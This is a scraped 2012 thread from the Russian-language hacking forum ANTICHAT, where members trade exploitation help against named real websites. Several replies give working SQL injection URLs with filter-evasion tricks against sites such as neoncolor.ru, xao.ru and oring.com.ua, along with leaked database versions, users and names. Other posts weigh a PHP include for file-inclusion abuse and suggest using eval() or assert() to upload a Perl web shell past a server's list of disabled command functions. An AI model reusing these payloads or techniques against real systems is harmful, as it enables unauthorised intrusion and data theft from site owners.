ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.09.2012, 21:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
847
Репутация:
0
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cfg'[/COLOR][COLOR="#007700"]]) and[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cfg'[/COLOR][COLOR="#007700"]])==[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'configfile'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cfg'[/COLOR][COLOR="#007700"]];
else
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'configfile'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]"cryptographp.cfg.php"[/COLOR][COLOR="#007700"];
include([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'configfile'[/COLOR][COLOR="#007700"]]);
[/COLOR][/COLOR]
Реально ли это как-то раскрутить? |
|
|
|
25.09.2012, 08:40
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от justonline
justonline said:
http://neoncolor.ru/catalog/?gr=18'
Фильтруется вообще куча всего, проще перечислить что не фильтруется =)
( substringкстати фильтруется тоже, чего не скажешь о substr)
Но тем не менее...
Для вывода версии юзал так
Код:
Code:
http://neoncolor.ru/catalog/?s=2&gr=642+and+ascii(lower(substr(@@version,1,1)))=53
Ну или более экзотический вариант
Код:
Code:
ttp://neoncolor.ru/catalog/?s=2&gr=642+and+right(left(@@version,1),1)=5
Version = 5.0.77
@@user и user() фильтруется, точно также обстоит дело и с именами БД.
Сообщение от M_script
M_script said:
зато connection_id() знает, так что мускул
http://neoncolor.ru/catalog/?gr=18+and+connection_id()=connection_id()
Абсолютно солидарен с товарищем - перед слепой инъекцией не поленитесь проверить с какой СУБД имеем дело, например руководствуясь уникальными функциями каждой СУБД этого поста
Сообщение от justonline
justonline said:
http://xao.ru/review'
тут дело обстоит намного проще - фильтруется пробелы - юзай /**/
Код:
Code:
http://xao.ru/review'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1
Duplicate entry ' 5.0.77-log' for key 1
User = 'cl61392_xaoruweb@localhost'
Database = 'cl61392_xaoruweb'
Сообщение от justonline
justonline said:
http://oring.com.ua
Прикольная скуля, не сразу додумался в каком параметре искать... Хоть бы указал...
Ну вот держи вектор атаки
Код:
Code:
http://oring.com.ua/products/uponor-wirsbo/truba1.php'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1
Duplicate entry ' 4.1.21-standard' for key 1
Version = 4.1.21-standard
User = oring_com_ua@localhost
Database = oring_com_ua
Дальше сам справишься?)
|
|
|
25.09.2012, 09:39
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Небольшое дополнение. Вынесу в отдельный пост, а то предыдущий длиннопост и так сложен для восприятия.
Надеюсь, модераторы не осерчают... =)
Сообщение от justonline
justonline said:
http://neoncolor.ru/catalog/?gr=18
Не давала покоя скуля, была идея проверить на магические кавычки, вдруг получится шелл залить...
Код:
Code:
http://neoncolor.ru/catalog/?s=2&gr=642+and+1=IF('123'=123,1,0) FALSE
http://neoncolor.ru/catalog/?s=2&gr=642+and+1=IF(123=123,1,0) TRUE
Как видишь, облом.
Так что, ИМХО, на сайт можно забить... |
|
|
|
25.09.2012, 15:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
281
Репутация:
0
|
|
Что можно выжать из этого ?
Код:
Code:
http://kb.8day.ru/objects.php?serv=1&it=W'
|
|
|
|
25.09.2012, 15:30
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Rifes
Rifes said:
Что можно выжать из этого ?
Код:
Code:
http://kb.8day.ru/objects.php?serv=1&it=W'
Не более чем раскрытие путей. Инъекции я тут не увидел.
|
|
|
|
27.09.2012, 07:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Сообщение от pvitalik80
pvitalik80 said:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cfg'[/COLOR][COLOR="#007700"]]) and[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cfg'[/COLOR][COLOR="#007700"]])==[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'configfile'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cfg'[/COLOR][COLOR="#007700"]];
else
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'configfile'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]"cryptographp.cfg.php"[/COLOR][COLOR="#007700"];
include([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'configfile'[/COLOR][COLOR="#007700"]]);
[/COLOR][/COLOR]
Реально ли это как-то раскрутить? Скорее нет чем да, инклудить можно только из текущей папки.
|
|
|
|
27.09.2012, 10:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Код:
Code:
Disabled PHP Functions: apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system
какие еще функции есть которые выполняяют системные команды? |
|
|
|
27.09.2012, 10:17
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от blesse
blesse said:
Код:
Code:
Disabled PHP Functions: apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system
какие еще функции есть которые выполняяют системные команды? Это необходимо смотреть по функциям и классам, доступным на данном сервере вычитая из них всё заблокированное и бесполезное. Такие вопросы обычно решаются индивидуально т.к. сложно дать ответ не имея полного представления о сервере.
UDP. Всю необходимую информацию можно получить с помощью get_defined_functions(), get_defined_vars(), get_defined_constants() и get_declared_classes().
|
|
|
|
27.09.2012, 12:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Сообщение от XAMEHA
XAMEHA said:
Это необходимо смотреть по функциям и классам, доступным на данном сервере вычитая из них всё заблокированное и бесполезное. Такие вопросы обычно решаются индивидуально т.к. сложно дать ответ не имея полного представления о сервере.
какие данные предоставить о системе ?
|
|
|
|
27.09.2012, 14:24
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
blesse, ну у вас хотя бы нет в списке eval() и assert() . Можете через них свободно работать, залить через них Perl Shell (PPS 1.0) и дальше можете плевать на все эти ограничения т.к. Ваш список применим только к РНР файлам!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
